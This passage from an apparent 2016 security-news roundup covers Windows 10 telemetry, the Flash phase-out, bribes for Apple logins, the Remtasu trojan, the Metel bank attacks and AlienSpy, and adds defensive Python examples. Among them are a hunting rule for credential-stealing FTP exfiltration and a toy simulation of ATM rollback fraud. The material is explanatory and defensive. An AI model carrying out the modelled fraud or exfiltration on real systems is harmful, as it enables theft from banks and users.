Note that this analysis was conducted on Windows 10 Enterprise, the edition with the most granular user control, far more than the Windows 10 Home edition used by most consumers.
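To reproduce a tally like the one above from your own router's connection log, here is an added example (not the tester's tooling). The log format, the sample lines and the prefix list used to attribute addresses to one owner are constructed; in practice the prefixes would come from WHOIS or BGP data for the organization in question.

```python
"""Summarize outbound connection attempts from a router/firewall log, the way
the Windows 10 telemetry test described above was tallied.

Added example, not the original tester's tooling. The log layout and the
owner prefix list are constructed for the demo.
"""
import ipaddress
from collections import Counter

# Constructed sample lines: "epoch src_ip dst_ip dst_port proto"
# (one deliberately malformed line to show it is skipped).
SAMPLE_LOG = """\
1454976000 192.168.1.50 51.10.20.30 443 tcp
1454976005 192.168.1.50 51.10.20.30 443 tcp
1454976010 192.168.1.50 51.10.20.31 80 tcp
1454976020 192.168.1.50 93.184.216.34 443 tcp
1454976030 192.168.1.50 192.168.1.1 53 udp
garbage line that does not parse
1454976040 192.168.1.50 51.10.20.30 443 tcp
1454976050 192.168.1.50 64.100.0.5 123 udp
"""

# Hypothetical prefix standing in for an organization's announced ranges.
OWNER_PREFIXES = [ipaddress.ip_network("51.10.20.0/24")]


def parse_log(text):
    """Yield (timestamp, src, dst, port, proto) tuples; skip malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, port, proto = parts
        try:
            yield (int(ts), ipaddress.ip_address(src),
                   ipaddress.ip_address(dst), int(port), proto)
        except ValueError:
            continue


def summarize(text, owner_prefixes=OWNER_PREFIXES):
    """Count external connection attempts overall and to the owner's prefixes.

    Private, loopback and link-local destinations (the local router, mDNS,
    etc.) are excluded so the numbers reflect traffic that leaves the LAN.
    """
    total = Counter()
    owner = Counter()
    for _, _, dst, _, _ in parse_log(text):
        if dst.is_private or dst.is_loopback or dst.is_link_local:
            continue
        total[dst] += 1
        if any(dst in net for net in owner_prefixes):
            owner[dst] += 1
    return {
        "attempts": sum(total.values()),
        "distinct_ips": len(total),
        "owner_attempts": sum(owner.values()),
        "owner_distinct_ips": len(owner),
        "top": total.most_common(3),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(key, value)
```

Counting attempts rather than bytes is the right measure for an idle machine: the question is how often the OS reaches out, not how much it sends, and the per-destination breakdown is what lets you separate update checks and time sync from everything else.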
The Greatest Cost to Owning 'Free' Windows 10
Based on these logs alone, it would be inaccurate to say that Windows 10 is sending your personal data to Microsoft's servers. But thousands of connection attempts in eight hours is hard to explain as merely checking for updates or syncing the clock.
A September 2015 blog post by Terry Myerson, head of the Windows team, explained that while Windows 10 does send some data to the company, everything is encrypted and none of it includes personal details.
Here's what Microsoft says about the Windows 10 Spying concerns:
"We collect a limited amount of information to help us provide a secure and reliable experience. This includes data like an anonymous device ID, device type, and application crash data which Microsoft and our developer partners use to continuously improve application reliability. This doesn't include any of your content or files, and we take several steps to avoid collecting any information that directly identifies you, such as your name, email address or account ID."
While this research does not show what Windows 10 is sending to the company even after telemetry is disabled, keep in mind that nothing comes for free. "Free" is a relative term, and you may be paying the greatest cost for owning Windows 10.
Bye bye, Flash! Google to Ban Flash-based Advertising
10.2.2016 Apple
Google to Ban Adobe Flash-based Advertising
Google has joined Apple, Facebook and YouTube in the push to kill Adobe Flash Player, announcing that it is dropping Flash banner support from its AdWords advertising platform.
"To enhance the browsing experience for more people on more devices, the Google Display Network and DoubleClick Digital Marketing are now going 100% HTML5" Google says.
For two decades Adobe Flash ruled web animation and was the de facto standard for playing online video.
Flash Player has also been notorious for zero-day exploits that put users at risk.
Adobe tried to keep up by releasing a steady stream of patches for newly reported vulnerabilities, but the constant patching annoyed both users and companies.
The endless troubleshooting of Flash Player plugins never fixed the underlying problem.
To put an end to this, major players including Apple, Facebook, YouTube, Google Chrome and Firefox have gravitated towards the replacement: HTML5.
Facebook's Security Chief publicly called for Adobe to announce a 'kill-date for Flash.'
Google Chrome has also begun blocking auto-playing Flash ads by default.
In January 2015, YouTube moved away from Flash for delivering videos.
Firefox also blocked the Flash plugin entirely until Adobe patched the flaws that prompted the block.
By dropping Flash, these companies removed a recurring source of the security problems that have plagued Adobe Flash for years, as well as a third-party dependency.
Steve Jobs predicted the end of Flash in his 2010 open letter on Flash:
“New open standards created in the mobile era, such as HTML5, will win on mobile devices (and PCs too). Perhaps Adobe should focus more on creating great HTML5 tools for the future, and less on criticizing Apple for leaving the past behind.”
HTML5 has gained popularity among developers by word of mouth and has many advantages, including smoother video playback.
So Google has officially declared that from June 30, 2016 it will no longer accept new Flash display ads into AdWords and DoubleClick Digital Marketing.
From January 2, 2017, Flash ads will stop running on the Google Display Network and DoubleClick Digital Marketing altogether, completing the Flash phase-out.
Adobe, meanwhile, has responded to Flash's reputation by rebranding its Flash Professional authoring tool as "Animate CC", adding features such as direct conversion of Flash files to HTML5 Canvas.
Adobe Animate CC, essentially an update to Flash Professional, supports Adobe Flash (SWF) and AIR formats "as first-class citizens", alongside other animation and video formats including HTML5 canvas, 4K and WebGL output.
Crooks are offering Apple employees up to $23,000 for their login credentials
10.2.2016 Apple
According to current and former Apple employees interviewed by Business Insider, cyber criminals are offering Apple staff in Ireland up to $23,000 for their login details.
Insiders are one of the greatest security problems for any organization: working from the inside, they can operate under the radar for a long time, stealing information and sabotaging processes and infrastructure.
Modern organizations are often helpless when facing insiders who threaten their information assets and intellectual property.
One of the most notorious recent insider cases involved the Yandex search engine: in December a former employee stole the source code of the Russian search engine and tried to sell it, algorithms included, for just $29,000 on the black market.
Corrupting an insider is the easiest way to breach an organization, and news of the day is an attempt to use that technique against Apple's European headquarters in Cork, Ireland.
Apple employees at Operations International in Cork, Ireland
Crooks are offering Irish Apple employees 20,000 euros ($23,000) in exchange for their corporate login details.
With an Apple employee's corporate credentials, attackers could breach the network, move laterally inside the company and exfiltrate valuable information from company archives.
“Hackers are offering Apple employees thousands of euros for their company login details, according to someone that works for the company in Ireland. The employee, who spoke to Business Insider on the condition we kept their anonymity, said there are a lot of people trying to get hold of Apple’s inside information.” reported the Business Insider.
“You’d be surprised how many people get on to us, just random Apple employees,” the Apple employee told Business Insider. “You get emails offering you thousands [of euros] to get a password to get access to Apple.”
“I could sell my Apple ID login information online for €20,000 ($23,000) tomorrow. That’s how much people are trying,” said another employee.
Apple is not underestimating the case. According to the company, no illicit activity has resulted from the proposals received by its employees, but the insider risk remains high.
As usual, the attackers know their target well: another former Apple employee confirmed to Business Insider that the crooks contact specific profiles inside the organization, approaching Apple staff and offering them money in exchange for login details or company information.
“They look for someone who has jumped diagonally into a junior managerial position, so not a lifer working their way up, and not a lifer who has been there a long time,” said the former Apple employee.
The case underlines the importance of the human factor in any organization: employees are the weakest link in the security chain. A disgruntled employee, or one not trained to recognize outside approaches, can become a backdoor into even a well-armored organization.
Vigilante Hackers Aim to Hijack 200,000 Routers to Make Them More Secure
10.2.2016 Hacking
The same vigilante hackers who previously compromised more than 10,000 routers to make them more secure are back in the headlines, having compromised more than 70,000 home routers and, in effect, forcing their owners to fix flaws and weak passwords.
Much like the infamous Lizard Squad, the group of white-hat hackers, dubbed the White Team, is building a sizeable botnet of hundreds of thousands of home routers, but for a good purpose.
Lizard Squad, the same group responsible for Sony PlayStation Network and Microsoft Xbox Live outages, uses their botnets to launch DDoS (Distributed Denial of Service) attacks against target websites to flood them with traffic and knock them offline.
Hacking Routers to Make them More Secure
Spurred by Lizard Squad's malicious work, the White Team built its own peer-to-peer botnet that infects routers to close off weaknesses such as:
Weak default passwords
DNS poisoning
Unauthorised access (backdoor)
Disabled firewalls
Their malware, dubbed "Linux.Wifatch" or simply "Wifatch", has been in use by the team since last year, continues to be updated and has been open-sourced on GitHub.
First discovered in November 2014 by an independent malware researcher known as "Loot Myself" and analysed by Symantec last year, the malware now includes additional routines to remove other malicious software and backdoors already on the device.
According to Symantec, which continues to monitor the team's botnet, the White Team has access to around 70,000 devices.
Good Malware to Fight Bad Malware
Lizard Squad's botnet contained somewhere between 120,000 and 150,000 bots, a Lizard spokesperson told Forbes, claiming that it includes not just home routers and PCs but smart refrigerators, smart TVs and other smart home devices as well.
The White Team aims to hack and protect between 150,000 and 200,000 devices from Lizard Squad attacks, thereby removing the rogue gang from people's homes.
However, the vigilantes face some hurdles, particularly with the Wifatch malware itself, which is often too big to install on smaller routers.
"The goal is to use (most) of the 60,000 nodes we have to connect to the hundreds of thousands of boxes that are too small for our normal disinfector and disinfect them remotely," the hacker collective told the publication over encrypted email.
Since there are so many vulnerable devices that can be hacked with little or no effort, these vigilante hackers are not the answer to this widespread problem; they can only help minimize it.
The White Team is not the only group of vigilante hackers trying to secure the Internet. Just last week, an anonymous hacker was found replacing Dridex, the most active banking malware, with copies of Avira security software.
Hackers Are Offering Apple Employees $23,000 for Corporate Login Details
10.2.2016 Apple
An unhappy employee can turn into a nightmare for you and your organization.
These days, installing antivirus or other anti-malware programs is not enough to protect the corporate database.
What would you do if one of your own employees backstabbed you by leaking hypersensitive corporate secrets?
The possibility of an internal breach is always there.
Just last year, an ex-employee stole the Yandex search engine source code and tried to sell it for just $29,000 on the underground market.
Over the years, hackers have adopted techniques ranging from stress attacks to social engineering in order to obtain classified corporate information.
Hackers Offering $23,000 for Internal Access
Now hackers are rolling the dice on their next deceptive step: acquiring the corporate login details of Irish Apple employees in exchange for 20,000 euros ($23,000).
This is the situation facing employees at Apple's European headquarters in Cork, Ireland.
The offers arrive in the mailboxes of random Apple employees from unknown hackers and criminals, asking for the employee's Apple login passwords in return for 20,000 euros.
"You'd be surprised how many people get on to us, just random Apple employees," the anonymous employee said. "You get emails offering you thousands [of euros] to get a password to get access to Apple."
"I could sell my Apple ID login information online for €20,000 ($23,000) tomorrow. That’s how much people are trying," another employee said.
The offers are reportedly aimed at staff who are not company lifers and are unlikely to stay long, widening the chance of finding an entry point to the company's data.
With an Apple employee's login credentials in their pocket, hackers would hold the crown jewels for malicious activity from which they could reap financial profit.
Apple is taking the scam very seriously, and so far no employee is known to have handed over login credentials for illicit gain.
Internal Breach
One of the home-grown threats to your organization is the insider. According to a survey conducted by SANS last year, 71% of respondents fear an insider attack.
The consequences of such a threat can go as far as the liquidation of your company.
The Department of Homeland Security (DHS) and the FBI have also pressed the issue, underlining that a majority of threats originate with an insider.
Lack of technical training for employees, lack of budget and inappropriate policies widen the chances of a breach.
Hiring a security firm, properly training all employees about the latest threats, shutting down an employee's accounts as soon as he or she is terminated, rotating passwords regularly and limiting employee access to sensitive documents would cover such weaknesses.
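Two of those controls, prompt disabling of leavers' accounts and password rotation, can be checked mechanically. The following is an added example, not Apple's process: it reconciles a constructed directory export against a constructed HR termination feed and flags violations. Column names, the 90-day threshold and the reference date are assumptions.

```python
"""Leaver and password-age reconciliation over an account export.

Added example for this article, not any company's real process. The CSV
layouts, the policy threshold and the reference date are constructed.
"""
import csv
import io
from datetime import date

# Constructed directory export: account, owner, enabled flag, last password change.
ACCOUNTS_CSV = """\
username,employee_id,enabled,pwd_last_set
jdoe,1001,true,2016-01-15
asmith,1002,true,2015-06-01
contractor7,1003,true,2016-02-01
bjones,1004,false,2015-12-20
"""

# Constructed HR feed: who left and when.
TERMINATIONS_CSV = """\
employee_id,termination_date
1002,2016-01-20
1004,2015-12-18
"""

PASSWORD_MAX_AGE_DAYS = 90          # assumed rotation policy
TODAY = date(2016, 2, 10)           # fixed reference date so the demo is reproducible


def load_csv(text):
    return list(csv.DictReader(io.StringIO(text)))


def find_issues(accounts_csv, terminations_csv, today, max_age_days=PASSWORD_MAX_AGE_DAYS):
    """Return sorted (issue, username, days) tuples.

    terminated_but_enabled: HR says the person left, the directory still lets
    them log in; 'days' is how long the account has stayed open after leaving.
    stale_password: enabled account whose password is older than the policy.
    Disabled accounts are skipped for both checks: a disabled account cannot be
    used, so its stale password is not an exposure.
    """
    accounts = load_csv(accounts_csv)
    terminated = {row["employee_id"]: date.fromisoformat(row["termination_date"])
                  for row in load_csv(terminations_csv)}
    issues = []
    for acct in accounts:
        enabled = acct["enabled"].strip().lower() == "true"
        if not enabled:
            continue
        emp = acct["employee_id"]
        if emp in terminated:
            days_open = (today - terminated[emp]).days
            issues.append(("terminated_but_enabled", acct["username"], days_open))
        pwd_age = (today - date.fromisoformat(acct["pwd_last_set"])).days
        if pwd_age > max_age_days:
            issues.append(("stale_password", acct["username"], pwd_age))
    return sorted(issues)


def demo():
    return find_issues(ACCOUNTS_CSV, TERMINATIONS_CSV, TODAY)


if __name__ == "__main__":
    for issue, user, days in demo():
        print(f"{issue}: {user} ({days} days)")
```

In the sample data the same account trips both rules: a leaver whose access was never revoked and whose password has not changed in months is exactly the kind of credential an outside buyer would pay for.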
Now, before purchasing the high-end firewalls or Virus Destructors, just turn around and look…
...Who’s at your back!
February 2016 Patch Tuesday – All Windows are affected by a critical flaw
10.2.2016 Vulnerebility
Microsoft February 2016 Patch Tuesday updates include a total of 13 bulletins that resolve a total of 41 security flaws in Windows, one of them affects all supported versions.
All supported versions of Windows are affected by a critical vulnerability recently fixed by Microsoft. The IT giant has released 13 security bulletins, six of them rated critical, resolving a total of 41 security flaws in Microsoft software.
One of the bulletins in the February 2016 Patch Tuesday, MS16-022, fixes the 22 Flash Player flaws recently resolved by Adobe in the Flash libraries embedded in Internet Explorer 10 and 11 and in Edge.
A vulnerability affecting every supported version of Windows, including Windows 10 and Windows Server 2016 Technical Preview 4, has captured the attention of the security community.
The flaw fixed by MS16-013 is a memory-corruption bug in Windows Journal that could be exploited by remote attackers to execute arbitrary code as the logged-in user by tricking the user into opening a specially crafted Journal file. Fortunately, according to Microsoft, the vulnerability has not been exploited in the wild.
This would let an attacker run malicious programs on the targeted machine and create new accounts with full user rights.
“The vulnerability could allow remote code execution if a user opens a specially crafted Journal file. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.” states the official description published by Microsoft.
The February 2016 Patch Tuesday list also includes MS16-015, which fixes critical vulnerabilities in Microsoft Office that can be exploited to execute arbitrary code in the context of the targeted user simply by tricking the victim into opening a specially crafted Office file.
The complete list of fixes is reported below:
MS16-009: A cumulative security update for Internet Explorer 9 through 11. The update patches 13 security issues, including remote-code-execution (RCE) and information disclosure bugs.
MS16-011: A cumulative update for Microsoft's newest browser, Edge, on Windows 10 patches 6 security issues, 4 of which are remote code execution vulnerabilities.
MS16-012: An update that addresses two remote code execution flaws in the Windows PDF Library and Reader for Windows 8.1, Windows 10 and Server 2012. The flaws could allow attackers to run malicious code on an affected system by tricking users into opening a specially crafted PDF file.
MS16-015: An update that patches 6 memory-corruption vulnerabilities in Microsoft Office, each of which could allow a remote attacker to run arbitrary code by tricking a user into opening a specially crafted Office file.
MS16-022: A security update that resolves 22 vulnerabilities in Adobe Flash Player on all supported versions of Windows 8.1, Windows 10, Windows Server 2012, Windows Server 2012 R2 and Windows RT 8.1.
Microsoft also launched a page for publicly tracking Windows 10 updates (Windows 10 update history), an effort to show users the improvements the company is making to its OS.
“We’re committed to our customers and strive to incorporate their feedback, both in how we deliver Windows as a service and the info we provide about Windows 10,” states Microsoft.
“In response to this feedback, we are providing more details about the Windows 10 updates we deliver through Windows Update. You’ll see a summary of important product developments included in each update, with links to more details.”
All Versions of Windows affected by Critical Security Vulnerability
10.2.2016 Vulnerebility
Microsoft has released 13 security bulletins, six of which are considered to be critical, resolving a total of 41 security vulnerabilities in its software this month.
Every Windows version Affected:
One of the critical vulnerabilities affects all supported versions of Windows, including Microsoft's newest Windows 10 operating system, as well as Windows Server 2016 Technical Preview 4.
The memory-corruption flaw (MS16-013) could allow a remote attacker to execute arbitrary code as the logged-in user by tricking the user into opening a specially crafted Journal file.
This vulnerability would let the attacker run malicious programs on the victim's machine, even delete data and create new accounts with full user rights.
Users with administrator accounts are at greater risk than those with fewer rights on the system. The good news is that the vulnerability has not been spotted in the wild.
List of All Critical Vulnerabilities
Other Critical Security Updates are as listed below:
MS16-009: A cumulative security update for Internet Explorer 9 through 11. The update patches 13 security issues, including remote code execution (RCE) and information disclosure bugs.
MS16-011: A cumulative update for Microsoft's newest browser, Edge, on Windows 10 patches 6 security issues, 4 of which are remote code execution vulnerabilities.
MS16-012: An update that addresses two remote code execution flaws in the Windows PDF Library and Reader for Windows 8.1, Windows 10 and Server 2012. The flaws could allow attackers to run malicious code on an affected system by tricking users into opening a specially crafted PDF file.
MS16-015: An update that patches 6 memory-corruption vulnerabilities in Microsoft Office, each of which could allow a remote attacker to run arbitrary code by tricking a user into opening a specially crafted Office file.
MS16-022: A security update that resolves 22 vulnerabilities in Adobe Flash Player on all supported versions of Windows 8.1, Windows 10, Windows Server 2012, Windows Server 2012 R2 and Windows RT 8.1.
All of the above critical vulnerabilities were privately reported to the tech giant and were not believed to have been exploited by attackers.
Other updates rated "important" address a remote code execution flaw and an elevation of privilege bug in Windows, as well as denial of service (DoS) vulnerabilities in Windows, the .NET Framework and Active Directory Federation Services (ADFS).
Windows 10 Update History Page Goes Live Today
Meanwhile, Microsoft also launched a dedicated page for keeping track of every Windows 10 update in order to improve transparency.
From today, you can visit the Windows 10 update history page to see the latest improvements, features and changes the company has made to its latest OS.
"We're committed to our customers and strive to incorporate their feedback, both in how we deliver Windows as a service and the info we provide about Windows 10," the company notes.
"In response to this feedback, we are providing more details about the Windows 10 updates we deliver through Windows Update. You'll see a summary of important product developments included in each update, with links to more details."
The Windows 10 update history page will be updated regularly as the company rolls out new updates and security patches to the operating system.
Are you searching for a Facebook Hacking Tool? Be careful!
10.2.2016 Hacking
Security experts at ESET have discovered a new variant of a known trojan disguised as a Facebook hacking tool.
Security researchers at ESET have published an interesting post about a new Facebook hacking tool. Every week I receive dozens of emails asking me for instructions on how to hack Facebook accounts.
The tool recently discovered will not help with that task; instead, it exposes users who download it to serious risk.
Beware of any software that promises to hack a Facebook account: running it can be very dangerous.
The tool, reported by THN, is dubbed Remtasu. It is advertised online as a Facebook hacking tool, but in reality it is a trojan that infects Windows systems.
The trojan is a well-known threat that has been circulating on the Internet for a long time; now crooks have found a different way to spread it.
Cyber criminals disguise it as software that can take over any Facebook account and steal Facebook credentials.
The tool contains a keylogger module that steals the user's own login credentials. Typically a user searching for a Facebook hacking tool finds the malicious application on direct download websites.
Once a user downloads the file from one of these websites and runs it, the Win32/Remtasu.Y malware executes on the victim's machine.
“Although these files are from the same family as those witnessed last year, the way they are being spread is different. We are no longer seeing propagation through e-mail. They are instead coming from direct download sites. Once a user downloads and executes the file, their data is compromised.” states a blog post published by ESET.
The Remtasu trojan captures keystrokes and reads the clipboard; everything it collects is stored locally in a data file and then sent to an FTP server.
The malware gains persistence on the infected system by saving a copy of itself in a folder it creates within the system32 folder.
“As is to be expected in this type of threat, the virus always seeks a way to remain on the computer even when the victim reboots their system or attempts to find the threat in the list of active processes.” continues the post.
“In this case, the malware replicates itself, saving the copy in a folder that it also creates within the system32 folder. The new InstallDir folder remains hidden inside the system files, making it difficult for users to access.”
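A hunting rule for the two behaviours ESET describes, a drop into a hidden InstallDir folder under System32 followed by an outbound FTP connection from the same process, written as an added example over constructed Sysmon-style events. This is not ESET's detection logic; the event field names, process names and addresses are assumptions.

```python
"""Hunt for the Remtasu behaviour pattern in endpoint telemetry.

Added example, not ESET's detection. The event records are constructed to
resemble Sysmon-style file-create and network-connect events; field names,
paths and addresses are assumptions for the demo.
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    {"type": "file_create", "pid": 4321, "image": r"C:\Users\bob\Downloads\fb_hack.exe",
     "target": r"C:\Windows\System32\InstallDir\fb_hack.exe"},
    {"type": "file_create", "pid": 4321, "image": r"C:\Users\bob\Downloads\fb_hack.exe",
     "target": r"C:\Windows\System32\InstallDir\keys.dat"},
    {"type": "net_connect", "pid": 4321, "image": r"C:\Users\bob\Downloads\fb_hack.exe",
     "dst_ip": "198.51.100.23", "dst_port": 21, "proto": "tcp"},
    # Benign noise: a system process writing elsewhere under System32...
    {"type": "file_create", "pid": 880, "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\System32\config\systemprofile\AppData\x.log"},
    # ...and a legitimate FTP client making an FTP connection.
    {"type": "net_connect", "pid": 1200, "image": r"C:\Program Files\FileZilla\filezilla.exe",
     "dst_ip": "192.0.2.10", "dst_port": 21, "proto": "tcp"},
]

# The folder name comes from ESET's description; the drive-letter prefix is generic.
SYSTEM32_DROP = re.compile(r"^[A-Z]:\\Windows\\System32\\InstallDir\\", re.IGNORECASE)
FTP_PORTS = {21}


def classify(events):
    """Return (alert_pids, evidence_by_pid).

    Either signal alone is only suspicious (installers write to System32,
    FTP clients use port 21). Both from the same process is the Remtasu
    pattern: stage a copy and a capture file, then push the capture out.
    """
    evidence = defaultdict(set)
    for ev in events:
        if ev["type"] == "file_create" and SYSTEM32_DROP.match(ev["target"]):
            evidence[ev["pid"]].add("writes_system32_installdir")
        if ev["type"] == "net_connect" and ev.get("dst_port") in FTP_PORTS:
            evidence[ev["pid"]].add("outbound_ftp")
    required = {"writes_system32_installdir", "outbound_ftp"}
    alerts = [pid for pid, signals in evidence.items() if required <= signals]
    return sorted(alerts), dict(evidence)


if __name__ == "__main__":
    alerts, evidence = classify(SAMPLE_EVENTS)
    for pid in alerts:
        print(f"ALERT pid={pid} signals={sorted(evidence[pid])}")
```

Correlating on the process rather than alerting on each signal separately is what keeps the rule quiet on a normal workstation; in a real deployment the FTP leg would also be matched on protocol content or destination reputation, since port 21 alone is a weak indicator.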
The campaign based on the fake Facebook hacking tool has mainly infected users in Colombia, Turkey and Thailand.
Russian Metel group manipulated ruble-dollar exchange rate with malware
10.2.2016 Virus
A Russian cyber criminal group known as METEL hacked the systems of the Kazan-based Energobank and manipulated the ruble-dollar exchange rate by infecting them with malware.
A Russian cyber gang hacked the systems of the Kazan-based Energobank and manipulated the ruble-dollar exchange rate after infecting them with malware.
The event occurred exactly one year ago, in February 2015, when the hacking group dubbed METEL breached the Russian regional bank for just 14 minutes, causing the exchange rate to swing between 55 and 66 rubles per dollar.
The Moscow Exchange denied that its systems were hacked and stressed that its investigation found no evidence of currency market manipulation, suggesting that the fluctuations observed by users could have been caused by traders' mistakes.
The security firm Group-IB, which investigated the case, found that the Metel group infected the Kazan-based Energobank with the Corkow trojan and placed more than $500 million in orders at non-market rates.
Corkow is a backdoor that has compromised 250,000 computers worldwide at more than 100 financial institutions.
“This is the first documented attack using this virus and it has potential to do much more damage,” Dmitry Volkov, the head of Group-IB’s cyber intelligence department, told Bloomberg. “Once the malware has penetrated a local network, it is sophisticated enough to infect computers that are even not connected to the Internet.”
The threat actors used spear-phishing messages containing malicious links to compromise the victims' accounts. The economic impact of the attack has been estimated at 244 million rubles, nearly $3.2 million.
The Metel group is the same one referred to in the report recently published by Kaspersky Lab on Carbanak 2.0.
According to Kaspersky, the group targeted a Russian bank with the malware known as Metel (aka Corkow) and compromised banks' networks via spear-phishing emails.
The targeted financial institution discovered that hackers had stolen millions of rubles in a single night from the ATMs of other financial institutions: the attackers used ATM transaction rollbacks to withdraw money while the account balances remained untouched.
“In summer 2015, a bank in Russia discovered it had lost millions of rubles in a single night through a series of strange financial transactions. The bank’s clients were making withdrawals from ATMs belonging to other banks and were able to cash out huge sums of money while their balances remained untouched. The victim bank didn’t realize this until it tried to recoup the money withdrawn from the other banks’ ATMs.” states a blog post published by Kaspersky.
“The malware, used exclusively by the Metel group, infected the bank’s corporate network via e-mail and moved laterally to gain access to the computers within the bank’s IT systems. Having gained access to the bank operator’s money-processing system, the gang pulled off a clever trick by automating the rollback of ATM transactions. This meant that money could be stolen from ATM machines via debit cards while the balance on the cards remained the same, allowing for multiple transactions at different ATM machines.”
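To show why the trick worked and what the issuing bank could have looked for, here is an added simulation (not Kaspersky's analysis code or any bank's system) of the authorization and reversal flow, followed by a simple detection over the resulting log. Card numbers, terminal names, amounts and the reversal threshold are constructed.

```python
"""ATM transaction rollback abuse, as described in the Kaspersky report,
reduced to a toy issuer ledger plus the detection the issuer could run.

Added example, not Kaspersky's or any bank's code. All values are constructed.
"""
from collections import defaultdict


class IssuerCore:
    """Minimal issuer ledger: debit on authorization, credit on reversal."""

    def __init__(self, balances):
        self.balances = dict(balances)
        self.log = []   # (seq, card, terminal, kind, amount)
        self.seq = 0

    def _record(self, card, terminal, kind, amount):
        self.seq += 1
        self.log.append((self.seq, card, terminal, kind, amount))

    def authorize(self, card, terminal, amount):
        """Approve a withdrawal if funds exist; the acquiring ATM then dispenses."""
        if self.balances[card] < amount:
            self._record(card, terminal, "decline", amount)
            return False
        self.balances[card] -= amount
        self._record(card, terminal, "debit", amount)
        return True

    def reverse(self, card, terminal, amount):
        """Legitimate purpose: the ATM failed to dispense, so undo the debit.
        The attack automates this message after cash has in fact come out."""
        self.balances[card] += amount
        self._record(card, terminal, "reversal", amount)


def rollback_fraud(core, card, terminals, amount):
    """Attacker's loop: withdraw at other banks' ATMs, roll each debit back
    so the balance snaps back and the next withdrawal is approved too."""
    dispensed = 0
    for terminal in terminals:
        if core.authorize(card, terminal, amount):
            dispensed += amount              # cash leaves the other bank's ATM
            core.reverse(card, terminal, amount)
    return dispensed


def flag_rollback_abuse(log, max_reversals=2):
    """Cards with more reversals than max_reversals, with the terminals involved.
    One reversal is a jammed ATM; a run of them across different terminals is not."""
    per_card = defaultdict(list)
    for _, card, terminal, kind, _ in log:
        if kind == "reversal":
            per_card[card].append(terminal)
    return {card: sorted(set(terms)) for card, terms in per_card.items()
            if len(terms) > max_reversals}


def demo():
    core = IssuerCore({"4111": 1000, "4222": 500})
    core.authorize("4222", "ATM-HOME-1", 200)        # ordinary withdrawal
    core.authorize("4222", "ATM-HOME-1", 100)
    core.reverse("4222", "ATM-HOME-1", 100)          # one genuine failed dispense
    stolen = rollback_fraud(core, "4111", ["ATM-B1", "ATM-B2", "ATM-B3", "ATM-B4"], 900)
    return {"stolen": stolen,
            "balance_4111": core.balances["4111"],
            "flagged": flag_rollback_abuse(core.log)}


if __name__ == "__main__":
    print(demo())
```

The simulation shows the asymmetry the gang exploited: the issuer's books end up unchanged while the acquiring banks are out the cash, which is why the victim bank only noticed when the other banks came to settle.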
According to Kaspersky, the Metel group is still active and has targeted at least 30 Russian financial organizations.
Group-IB confirmed this, adding that the group is only known to be active in Russia, where it has affected 73% of Russian banks.
Rent the infamous AlienSpy backdoor is now quite easy
9.2.2016 Virus
Security experts at Kaspersky have spotted in the wild a new variant of AlienSpy RAT Family openly offered with a model of malware-as-a-service.
Today we will speak about a case of malware-as-a-service, in the specific case the threat is a remote access trojan, aka RAT, that could be used to gain control over multiple platforms, including Windows, Linux, Mac OS X, and Android.
The RAT belongs to a family of Java malware that exists since 2013 and that recently is offered for sale as a “commercial” backdoor-as-a-service. It is known as AlienSpy or Adawind, and security experts spotted it in an attack on an employee of a Singapore bank.
In April 2015, experts at Fidelis discovered that variants of the AlienSpy remote access trojan (RAT) were used in global phishing campaigns to deliver the popular Citadel banking Trojan and maintain the persistence inside the targeted architecture with a backdoor mechanism.
AlienSpy implements the typical features of other RATs plus further features, including the ability to capture webcam sessions, to steal browser credentials, to use the victim’s microphone to record environment conversations, to access files and to provide a remote desktop control.
AlienSpy uses plugins to implement the above capabilities, and experts have identified dozens of different plugins.
The AlienSpy botnet was taken down in 2015 when experts identified its command and control infrastructure and neutralized it.
Security experts at Kaspersky have spotted a new variant of the malware that has been modified and is offered as a service in the criminal underground. Researchers at Kaspersky observed more than 150 attack campaigns relying on the new variant of AlienSpy, in which bad actors targeted more than 60,000 individuals.
“[It] is open for service again to customers ranging from Nigerian scam operators to possible nation-state actors. Ars has confirmed that the service is offered openly through a website on the public Internet,” states Ars.
The analysis of subscribers to the malware-as-a-service revealed that the majority of clients come from the US, Canada, Russia, and Turkey.
The new variant of AlienSpy is dubbed JSocket and jRat and is available for rent on the Internet at prices ranging from $30 for one month to $200 for an unlimited version.
According to the researcher Vitaly Kamluk, who analyzed the threat, the author behind the service is a native Spanish speaker, likely Mexican.
The new variant of AlienSpy, aka JSocket and jRat, is widely adopted in scam schemes, particularly the Nigerian e-mail-based scam campaigns targeting bank customers.
Russian Hackers Manipulate Ruble-Dollar Exchange Rate with Malware
9.2.2016 Virus
A Russian hacking group reportedly broke into the Kazan-based Energobank and manipulated the ruble-dollar exchange rate.
In February 2015, a hacking group known as METEL breached the Russian regional bank for just 14 minutes and caused the exchange rate to fluctuate between 55 and 66 rubles per dollar, which ultimately resulted in an increase in the ruble's value.
Here's how they did it:
According to Russian security firm Group-IB, which investigated the incident, the Metel hacking group infected Kazan-based Energobank with a virus known as the Corkow Trojan and placed more than $500 million in orders at non-market rates.
“This is the first documented attack using this virus, and it has the potential to do much more damage,” Dmitry Volkov, the head of Group-IB’s cyber intelligence department, told Bloomberg.
The hackers used spear phishing, with an email that appeared to come from a legitimate source. A single click on the link in the malicious email gave them access to the system, which they then exploited.
After gaining access to a local system, the trojan spread through the bank's intranet. In this way the Corkow malware located the isolated system that handles the bank's money transactions with the outside world.
Corkow malware, initially discovered in 2011, regularly updates itself to evade detection by antivirus programs, and has infiltrated more than 250,000 computers worldwide and infected at least 100 financial institutions.
Bank lost 244 Million Rubles ($3.2 million)
The Energobank claimed losses of 244 million rubles ($3.2 million) due to the trades.
But the Moscow Exchange denied any hacking attempt, saying the market movements were the result of traders' mistakes. It also found no sign of currency manipulation.
The same malware was earlier used against Russian ATMs, attacking the Russian bank card system in August and resulting in hundreds of millions of rubles being stolen via ATMs. Another attack with the same malware allowed the hackers to use credit cards without limit.
Metel is only known to be active in Russia (it has affected 73% of Russian banks), although it may present a threat to financial institutions across the globe.
Authorities have not yet arrested any of the criminals behind the group, which poses a global threat to banks.
Apple Could Offer iMessage App for Android
9.2.2016 Android
Although Apple has its own operating system for both desktop (Mac OS X) and iPhone (iOS), the company has always tried to port its in-house applications to other OS platforms.
